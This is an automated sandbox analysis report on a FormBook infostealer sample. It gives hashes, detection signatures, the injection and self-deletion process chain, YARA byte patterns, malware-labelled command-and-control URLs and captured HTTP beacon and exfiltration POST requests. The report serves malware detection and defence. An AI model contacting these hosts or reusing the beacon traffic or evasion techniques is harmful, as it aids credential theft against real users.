Loading ...

Play interactive tourEdit tour

Analysis Report CN03716-2020.exe

Overview

General Information

Sample Name:CN03716-2020.exe
Analysis ID:288138
MD5:dd3f06103f2ac425cf4e5a6dc65d31d6
SHA1:972a1b325cc3abc48a94c90a7b51faea619cfcc9
SHA256:262d8dd389aad1ef11023ded97da5703e88f1a96c2b0b8a1dbdde5fa7ee04022
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • CN03716-2020.exe (PID: 6792 cmdline: 'C:\Users\user\Desktop\CN03716-2020.exe' MD5: DD3F06103F2AC425CF4E5A6DC65D31D6)
    • CN03716-2020.exe (PID: 6952 cmdline: C:\Users\user\Desktop\CN03716-2020.exe MD5: DD3F06103F2AC425CF4E5A6DC65D31D6)
    • CN03716-2020.exe (PID: 6960 cmdline: C:\Users\user\Desktop\CN03716-2020.exe MD5: DD3F06103F2AC425CF4E5A6DC65D31D6)
    • CN03716-2020.exe (PID: 6968 cmdline: C:\Users\user\Desktop\CN03716-2020.exe MD5: DD3F06103F2AC425CF4E5A6DC65D31D6)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 5404 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 2956 cmdline: /c del 'C:\Users\user\Desktop\CN03716-2020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.246609407.0000000002788000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18349:$sqlite3step: 68 34 1C 7B E1
      • 0x1845c:$sqlite3step: 68 34 1C 7B E1
      • 0x18378:$sqlite3text: 68 38 2A 90 C5
      • 0x1849d:$sqlite3text: 68 38 2A 90 C5
      • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
      0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.CN03716-2020.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.CN03716-2020.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.CN03716-2020.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17549:$sqlite3step: 68 34 1C 7B E1
          • 0x1765c:$sqlite3step: 68 34 1C 7B E1
          • 0x17578:$sqlite3text: 68 38 2A 90 C5
          • 0x1769d:$sqlite3text: 68 38 2A 90 C5
          • 0x1758b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x176b3:$sqlite3blob: 68 53 D8 7F 8C
          3.2.CN03716-2020.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            3.2.CN03716-2020.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: CN03716-2020.exeAvira: detected
            Antivirus detection for URL or domainShow sources
            Source: http://www.kardus6.xyzAvira URL Cloud: Label: malware
            Source: http://www.larvashop.net/cmg/www.8936199.comAvira URL Cloud: Label: malware
            Source: http://www.caneryis.comAvira URL Cloud: Label: malware
            Source: http://www.kardus6.xyz/cmg/Avira URL Cloud: Label: malware
            Source: http://www.fastroot.club/cmg/Avira URL Cloud: Label: malware
            Source: http://www.fastroot.club/cmg/www.larvashop.netAvira URL Cloud: Label: malware
            Source: http://www.iaimorganic.com/cmg/www.shizukis2.comAvira URL Cloud: Label: malware
            Source: http://www.caneryis.com/cmg/www.irelandjoy.comAvira URL Cloud: Label: malware
            Source: http://www.iaimorganic.comAvira URL Cloud: Label: malware
            Source: http://www.iaimorganic.com/cmg/Avira URL Cloud: Label: malware
            Source: http://www.larvashop.netAvira URL Cloud: Label: malware
            Source: http://www.kardus6.xyz/cmg/?7ntXxXIX=I0lrKqqP1MjreNOO9oMGFrx+rt2jE/QVhMf4sTzELVzYBASHhWo55iqsoHUB4gn2BcSZ&lN60-=WZA4zv6HmZTdfDAvira URL Cloud: Label: malware
            Source: http://www.fastroot.clubAvira URL Cloud: Label: malware
            Source: http://www.shizukis2.com/cmg/www.dropofluxe.comAvira URL Cloud: Label: malware
            Source: http://www.shizukis2.com/cmg/Avira URL Cloud: Label: malware
            Source: http://www.yumnamccann.com/cmg/www.1089konstanzter.comAvira URL Cloud: Label: malware
            Source: http://www.larvashop.net/cmg/Avira URL Cloud: Label: malware
            Source: http://www.shizukis2.comAvira URL Cloud: Label: malware
            Source: http://www.yumnamccann.com/cmg/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted fileShow sources
            Source: CN03716-2020.exeVirustotal: Detection: 20%Perma Link
            Source: CN03716-2020.exeReversingLabs: Detection: 25%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: CN03716-2020.exeJoe Sandbox ML: detected
            Source: 3.2.CN03716-2020.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49742
            Uses netstat to query active network connections and open portsShow sources
            Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            Source: global trafficHTTP traffic detected: GET /cmg/?7ntXxXIX=I0lrKqqP1MjreNOO9oMGFrx+rt2jE/QVhMf4sTzELVzYBASHhWo55iqsoHUB4gn2BcSZ&lN60-=WZA4zv6HmZTdfD HTTP/1.1Host: www.kardus6.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmg/?7ntXxXIX=kAH2BVdei1D7vSU7rMaayjSrbmqTqpimfamt4+2RIqx0uV21MEskAWuR+lK+LZwTVH6P&lN60-=WZA4zv6HmZTdfD HTTP/1.1Host: www.rootforequality.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: global trafficHTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.rootforequality.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.rootforequality.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rootforequality.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 37 6e 74 58 78 58 49 58 3d 73 69 4c 4d 66 31 38 74 68 32 76 73 35 69 6c 6d 38 49 72 34 69 57 53 39 51 6b 66 42 6f 36 4f 4d 49 36 76 76 7e 2d 4b 49 42 61 56 2d 6b 46 32 4b 45 31 35 75 41 43 71 63 39 32 79 65 4c 49 56 35 64 57 58 51 5a 36 46 4b 73 71 79 50 71 41 77 77 35 31 32 35 75 42 7a 5a 78 63 39 5a 67 59 4b 6e 6f 4f 31 44 73 42 64 41 64 33 79 6d 59 6d 62 50 4c 5a 31 51 69 52 36 75 31 44 37 56 78 48 6a 6b 53 77 6d 74 38 52 78 53 75 31 61 45 38 47 33 74 76 46 47 5f 6e 43 49 30 59 77 43 72 45 44 51 53 5a 43 76 4b 63 51 41 43 38 7a 4f 77 73 7a 53 72 68 4f 47 6e 4e 52 34 49 39 4d 6e 44 73 69 6c 46 4b 37 5a 67 6a 73 53 42 39 64 6c 31 53 30 35 34 52 43 36 32 36 65 43 6e 74 63 79 38 5a 4c 65 35 62 65 6d 67 6e 53 48 2d 36 30 30 31 47 46 44 76 63 75 28 47 7e 30 73 47 7e 30 76 78 35 79 50 7a 30 30 51 4f 48 41 35 7a 44 47 49 47 78 2d 44 44 41 49 28 5f 4c 6f 6b 4c 28 6a 6c 36 49 4e 7e 6f 42 41 47 33 76 62 6c 69 43 43 67 62 69 56 51 76 71 67 6a 59 64 73 66 44 75 5f 74 72 7a 34 71 79 59 4f 6c 51 43 59 54 64 47 68 4f 64 35 33 4d 4b 45 74 30 5f 75 63 7e 6b 50 50 6a 78 37 36 66 5f 46 6d 50 73 78 49 6c 63 30 4f 41 36 68 36 66 7a 69 33 50 4a 56 37 54 32 57 45 56 6f 4e 57 7e 71 38 65 56 52 74 63 51 37 68 66 53 68 53 6e 64 45 73 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 7ntXxXIX=siLMf18th2vs5ilm8Ir4iWS9QkfBo6OMI6vv~-KIBaV-kF2KE15uACqc92yeLIV5dWXQZ6FKsqyPqAww5125uBzZxc9ZgYKnoO1DsBdAd3ymYmbPLZ1QiR6u1D7VxHjkSwmt8RxSu1aE8G3tvFG_nCI0YwCrEDQSZCvKcQAC8zOwszSrhOGnNR4I9MnDsilFK7ZgjsSB9dl1S054RC626eCntcy8ZLe5bemgnSH-6001GFDvcu(G~0sG~0vx5yPz00QOHA5zDGIGx-DDAI(_LokL(jl6IN~oBAG3vbliCCgbiVQvqgjYdsfDu_trz4qyYOlQCYTdGhOd53MKEt0_uc~kPPjx76f_FmPsxIlc0OA6h6fzi3PJV7T2WEVoNW~q8eVRtcQ7hfShSndEsw).
            Source: global trafficHTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.rootforequality.comConnection: closeContent-Length: 163898Cache-Control: no-cacheOrigin: http://www.rootforequality.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rootforequality.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 37 6e 74 58 78 58 49 58 3d 73 69 4c 4d 66 77 5a 63 67 47 72 35 39 52 42 6e 39 63 50 77 7a 48 69 76 55 6a 4f 46 68 4e 36 6d 48 39 65 71 7e 2d 37 50 59 4c 46 73 67 6b 47 4b 47 32 52 70 47 69 71 64 71 6d 79 64 5a 34 49 4f 51 6b 58 6d 5a 37 52 67 73 71 36 4d 7a 7a 6f 31 35 6c 32 55 76 68 7e 39 6d 4d 70 43 67 61 50 4a 70 74 59 51 36 52 52 41 45 48 71 33 58 6e 4c 71 62 34 70 68 7e 56 53 76 35 69 53 56 32 31 33 32 41 46 50 4f 78 41 64 4d 71 44 61 65 7a 6d 6e 4a 72 57 32 30 70 79 64 38 58 52 47 47 5a 77 30 57 4e 6a 76 43 5a 55 30 44 79 54 6d 71 36 67 4b 4a 6e 5f 43 30 44 67 49 36 39 50 48 35 34 68 67 62 64 4d 5a 34 68 59 43 72 33 50 56 6b 50 54 74 65 56 45 58 4f 32 2d 79 49 76 64 43 37 4f 4b 79 57 59 63 76 72 71 57 4b 47 38 46 34 68 4f 52 4b 51 4c 65 4c 77 78 55 63 70 6d 46 6e 71 73 79 76 37 78 32 39 6e 44 67 35 49 4f 6d 49 43 35 75 44 33 53 59 37 34 58 4a 31 74 28 6c 42 57 53 4f 71 74 47 44 79 33 68 66 34 65 45 68 59 58 78 6b 67 58 75 68 6d 55 62 72 66 4b 6a 66 73 32 7a 36 43 44 59 4f 6b 38 43 5a 54 37 55 41 61 64 34 69 5a 52 44 4f 4d 37 73 63 28 38 4e 62 48 7a 79 70 4c 4a 46 6d 58 73 77 36 4e 36 6d 4a 63 36 72 49 48 77 69 55 58 4a 59 72 54 32 43 30 55 69 45 55 44 7a 39 66 70 62 72 50 38 6d 75 71 79 31 5a 55 67 51 78 7a 58 62 7e 4d 36 6d 54 78 4f 31 7e 4c 61 72 4f 41 67 37 61 79 55 61 6e 39 54 35 78 75 6e 7a 72 57 68 36 6a 49 61 62 6a 65 55 35 7a 7a 7a 61 39 45 7e 4f 5a 58 74 6d 49 37 53 75 53 33 7a 75 4a 4d 79 61 28 44 4a 46 48 68 33 73 6f 61 59 44 68 72 30 61 28 59 7a 37 64 36 37 57 59 61 4e 63 34 35 6e 57 71 39 37 79 39 52 6d 38 56 31 47 49 73 78 78 45 68 73 56 71 35 57 6e 4f 50 52 28 67 58 63 7a 72 30 69 75 48 74 51 50 73 52 31 78 77 6e 50 35 35 54 37 6b 6f 56 31 73 53 57 4f 49 63 58 4c 61 5a 7a 42 43 75 53 4f 61 2d 49 36 43 34 4a 6f 30 4f 62 41 57 6d 32 72 72 6b 65 54 54 47 34 4c 47 73 6e 64 6a 4c 47 32 71 49 55 78 6f 72 79 48 7e 49 45 4d 30 37 75 5a 79 62 63 4d 68 69 37 41 56 57 47 76 59 41 6d 32 6b 41 75 64 66 4f 65 59 69 36 77 63 4b 48 46 34 37 5a 79 2d 31 37 58 42 51 69 38 48 73 4d 42 4d 57 6f 28 64 62 54 47 54 4f 51 34 36 36 71 55 73 55 32 7a 4c 53 4a 59 32 63 51 44 6d 39 4d 64 53 6a 76 6d 30 6b 48 68 38 77 36 71 2d 79 73 45 5f 73 77 47 64 42 51 36 70 59 59 56 59 52 70 66 6b 53 33 46 66 58 44 61 67 4d 52 75 71 65 46 44 4e 45 73 59 7a 34 4f 63 55 4d 39 6c 42 43 32 4e 76 6a 74 4b 78 65 38 50 4e 66 66 5a 64 48 45 69 68 7e 30 31 61 41 59 63 65 6c 61 47 76 47 4f 6a 55 54 77 51 70 56 77 73 47 48 62 67 35 77 6e 66 4f 68 49 4a 57 6a 4c 53 6d 77 6b 67 6d 4d 34 77 67 36 66 6d 65 4f 33 42 36 7a 77 41 6c 78 77 74 70 33 57 46 7a 33 37 79 4a 7
            Source: global trafficHTTP traffic detected: GET /cmg/?7ntXxXIX=I0lrKqqP1MjreNOO9oMGFrx+rt2jE/QVhMf4sTzELVzYBASHhWo55iqsoHUB4gn2BcSZ&lN60-=WZA4zv6HmZTdfD HTTP/1.1Host: www.kardus6.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmg/?7ntXxXIX=kAH2BVdei1D7vSU7rMaayjSrbmqTqpimfamt4+2RIqx0uV21MEskAWuR+lK+LZwTVH6P&lN60-=WZA4zv6HmZTdfD HTTP/1.1Host: www.rootforequality.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.kardus6.xyz
            Source: unknownHTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.rootforequality.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.rootforequality.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rootforequality.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 37 6e 74 58 78 58 49 58 3d 73 69 4c 4d 66 31 38 74 68 32 76 73 35 69 6c 6d 38 49 72 34 69 57 53 39 51 6b 66 42 6f 36 4f 4d 49 36 76 76 7e 2d 4b 49 42 61 56 2d 6b 46 32 4b 45 31 35 75 41 43 71 63 39 32 79 65 4c 49 56 35 64 57 58 51 5a 36 46 4b 73 71 79 50 71 41 77 77 35 31 32 35 75 42 7a 5a 78 63 39 5a 67 59 4b 6e 6f 4f 31 44 73 42 64 41 64 33 79 6d 59 6d 62 50 4c 5a 31 51 69 52 36 75 31 44 37 56 78 48 6a 6b 53 77 6d 74 38 52 78 53 75 31 61 45 38 47 33 74 76 46 47 5f 6e 43 49 30 59 77 43 72 45 44 51 53 5a 43 76 4b 63 51 41 43 38 7a 4f 77 73 7a 53 72 68 4f 47 6e 4e 52 34 49 39 4d 6e 44 73 69 6c 46 4b 37 5a 67 6a 73 53 42 39 64 6c 31 53 30 35 34 52 43 36 32 36 65 43 6e 74 63 79 38 5a 4c 65 35 62 65 6d 67 6e 53 48 2d 36 30 30 31 47 46 44 76 63 75 28 47 7e 30 73 47 7e 30 76 78 35 79 50 7a 30 30 51 4f 48 41 35 7a 44 47 49 47 78 2d 44 44 41 49 28 5f 4c 6f 6b 4c 28 6a 6c 36 49 4e 7e 6f 42 41 47 33 76 62 6c 69 43 43 67 62 69 56 51 76 71 67 6a 59 64 73 66 44 75 5f 74 72 7a 34 71 79 59 4f 6c 51 43 59 54 64 47 68 4f 64 35 33 4d 4b 45 74 30 5f 75 63 7e 6b 50 50 6a 78 37 36 66 5f 46 6d 50 73 78 49 6c 63 30 4f 41 36 68 36 66 7a 69 33 50 4a 56 37 54 32 57 45 56 6f 4e 57 7e 71 38 65 56 52 74 63 51 37 68 66 53 68 53 6e 64 45 73 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 7ntXxXIX=siLMf18th2vs5ilm8Ir4iWS9QkfBo6OMI6vv~-KIBaV-kF2KE15uACqc92yeLIV5dWXQZ6FKsqyPqAww5125uBzZxc9ZgYKnoO1DsBdAd3ymYmbPLZ1QiR6u1D7VxHjkSwmt8RxSu1aE8G3tvFG_nCI0YwCrEDQSZCvKcQAC8zOwszSrhOGnNR4I9MnDsilFK7ZgjsSB9dl1S054RC626eCntcy8ZLe5bemgnSH-6001GFDvcu(G~0sG~0vx5yPz00QOHA5zDGIGx-DDAI(_LokL(jl6IN~oBAG3vbliCCgbiVQvqgjYdsfDu_trz4qyYOlQCYTdGhOd53MKEt0_uc~kPPjx76f_FmPsxIlc0OA6h6fzi3PJV7T2WEVoNW~q8eVRtcQ7hfShSndEsw).
            Source: CN03716-2020.exe, 00000000.00000003.221388239.0000000005783000.00000004.00000001.sdmpString found in binary or memory: http://en.wU&
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: CN03716-2020.exe, 00000000.00000002.246493177.0000000002721000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.1089konstanzter.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.1089konstanzter.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.1089konstanzter.com/cmg/www.fastroot.club
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.1089konstanzter.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.8936199.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.8936199.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.8936199.com/cmg/www.northminute.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.8936199.comReferer:
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: CN03716-2020.exe, 00000000.00000003.224417534.0000000005783000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.caneryis.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.caneryis.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.caneryis.com/cmg/www.irelandjoy.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.caneryis.comReferer:
            Source: CN03716-2020.exe, 00000000.00000003.223655773.0000000005786000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: CN03716-2020.exe, 00000000.00000003.223582776.0000000005788000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com&E
            Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com/E-
            Source: CN03716-2020.exe, 00000000.00000003.223410037.0000000005788000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com01
            Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com;3
            Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comC
            Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
            Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comcn
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comm)
            Source: CN03716-2020.exe, 00000000.00000003.223582776.0000000005788000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn
            Source: CN03716-2020.exe, 00000000.00000003.223655773.0000000005786000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comwhi
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.dropofluxe.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.dropofluxe.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.dropofluxe.com/cmg/www.ravomail.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.dropofluxe.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.fastroot.club
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.fastroot.club/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.fastroot.club/cmg/www.larvashop.net
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.fastroot.clubReferer:
            Source: CN03716-2020.exe, 00000000.00000003.226480549.000000000577A000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
